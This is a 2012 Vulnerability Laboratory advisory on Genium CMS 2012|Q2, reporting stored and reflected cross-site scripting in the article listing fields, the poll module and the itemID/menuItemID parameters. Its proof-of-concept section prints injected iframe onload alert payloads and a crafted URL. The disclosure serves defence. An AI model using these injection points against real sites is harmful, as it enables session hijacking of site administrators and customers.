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vulnerlabVulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (Rem0ve)VULNERLAB:517
HistoryMay 01, 2012 - 12:00 a.m.

Genium CMS 2012|Q2 - Multiple Web Vulnerabilities

Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (Rem0ve)
Document Title:
Genium CMS 2012|Q2 - Multiple Web Vulnerabilities

References (Source):

Release Date:

Vulnerability Laboratory ID (VL-ID):

Common Vulnerability Scoring System:

Product & Service Introduction:
Durch den Einsatz von Genium CMS können Sie Ihre Homepage schnell und unabhängig von Spezialisten betreuen. 
Kostengünstig, schnell und flexibel. Das Erstellen von Internetseiten durch eine Webagentur kostet viel 
Geld und ist in der Regel nicht von heute auf morgen realisierbar. Mit Genium CMS sparen Sie Kosten und 
verkürzen Ihre Kommunikationswege drastisch. Bei Aktualisierungen müssen Sie nicht darauf warten bis Ihr 
EDV-Techniker Zeit hat neue Inhalte online zu stellen. Änderungen, Korrekturen und Ergänzungen realisieren 
Sie innert Minuten! Um Ihre Homepage aktiv zu nutzen, ist es unumgänglich, dass Sie schnell auf neue Situationen 
reagieren können. Nur so ist eine direkte Kommunikation mit Ihren Kunden möglich. Die Aktualität Ihrer Homepage 
ist ein Schlüsselfaktor für einen erfolgreichen Webauftritt. 

(Copy of the Vendor Homepage: )

Abstract Advisory Information:
The Vulnerability Laboratory Researcher Team discovered multiple Web Vulnerabilities in Geniums Content Management System 2012|Q2.

Vulnerability Disclosure Timeline:
2012-05-01:	Public or Non-Public Disclosure

Discovery Status:

Exploitation Technique:

Severity Level:

Technical Details & Description:
Multiple persistent input validation vulnerabilities are detected in Geniums Content Management System 2012|Q2.
The bugs allow remote attackers to implement/inject malicious script code on the application-side (persistent).
Successful exploitation of the vulnerability can lead to session hijacking (manager/admin) or stable (persistent) 
context manipulation. Exploitation requires low user inter action. The bugs are located on the article listing & pool 
fields of the application which allows to execute code out of the main genium application context.

Vulnerable Module(s):
				[+] Article Listing & Add [SELL] - Artikelnummer, Bezeichnung & Preis
				[+] Umfrage - Questions & Answers


Multiple non persistent cross site scripting vulnerabilities are detected in Geniums Content Management System 2012|Q2.
The vulnerability allows remote attackers to hijack website customer, moderator or admin sessions with high required 
user inter action or local low privileged user account. Successful exploitation can result in account steal, phishing 
& client-side content request manipulation.

Vulnerable Module(s):
				[+] itemID
				[+] menuItemID


Proof of Concept (PoC):
The persistent input validation vulnerabilities can be exploited by remote attackers with low required user inter action. 
For demonstration or reproduce ...


Module: Article Listing & Add [SELL] - Artikelnummer, Bezeichnung & Preis

<form name="formArticle6" method="post" action="index.php5?site=basket"><input name="artikelnummer" value="" 
type="hidden"><iframe src="a" onload='alert("VL")' <"=""><input name="bezeichnung" type="hidden" value="&
quot;><iframe src=a onload=alert("VL") <"><input name="preis" 
type="hidden" value=""><iframe src=a onload=alert("VL") <"/><input name="stamp" type="hidden" 
value="1334501982"/><table border = "0" width="auto" CELLPADDING=0 CELLSPACING=0><tr><
td width="100%"><strong><nobr>Fr. 0.00   </nobr></strong>


Module:  Umfrage - Questions & Answers

<p class="title2">"><iframe src="a" onload='alert("VL")' <<="" p="">
<FORM ACTION="galerie.php5#2" METHOD=post NAME=pollform>
<TABLE WIDTH=50% cellspacing="0" cellpadding="0" border="0">
<input name='pollsModuleID' type='hidden' size='50' maxlength='50' value='2'>
<input type=radio name=question value='1'/>">
<iframe src=a onload=alert("VL") <<br><
input type=radio name=question value='2'/>"><iframe src=a onload=alert("VL") <<br>

The client side cross site scripting vulnerabilities can be exploited by remote attackers with medium or high required user inter action. 
For demonstration or reproduce ...

Review: Listing

<a href="index.php5?site=basket" class="menX">Warenkorb (1)</a><a class="menX" href="index.php5
?site=basketform">Bestellformular</a><a href="/galerie.php5?moduleID=1&itemID=%22%3E%3Ciframe%20src=
a%20onload=alert(%22VL%22)%20%3C&menuItemID=-1&moduleRenderType=solo&print" class="menX" target="_blank" >Drucken</a>     

... or

<a class="xmenu" href="#" onclick="'./xyloz/modules/photoalbum/photoalbum.editor.module.php5?

func=itemEdit&moduleXMLFile=1290873449_photoalbum.xml&itemID="><iframe src=a onload=alert("VL") <','mywindow',
'resizable=yes,scrollbars=off,width=740,height=550')" onmouseover='addValue("menu927297");' onmouseout='
subValue("menu927297");'><img src="./xyloz/images/xedit.gif" class="img" border="0">  bearbeiten</a>
<a class="xmenu" href="#" onclick="'./xyloz/modules/photoalbum/photoalbum.editor.module.php5?

func=itemDelete&moduleXMLFile=1290873449_photoalbum.xml&itemID="><iframe src=a onload=alert("VL") 

<&site=galerie','mywindow','resizable=yes,scrollbars=off,width=740,height=550')" onmouseover='addValue("menu927297");' 
onmouseout='subValue("menu927297");'><img src="./xyloz/images/xdel.gif" class="img" border="0">  löschen</a>

Security Risk:
The security risk of the persistent input validation vulnerabilities are estimated as medium(+).

The security risk of the non persistent cross site scripting vulnerabilities are estimated as low(+).

Credits & Authors:
Vulnerability Laboratory [Research Team]   -   Benjamin Kunz Mejri (Rem0ve)

Disclaimer & Information:
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

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Social:!/vuln_lab 		- 	       -
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Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and 
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    				   	Copyright © 2012 | Vulnerability Laboratory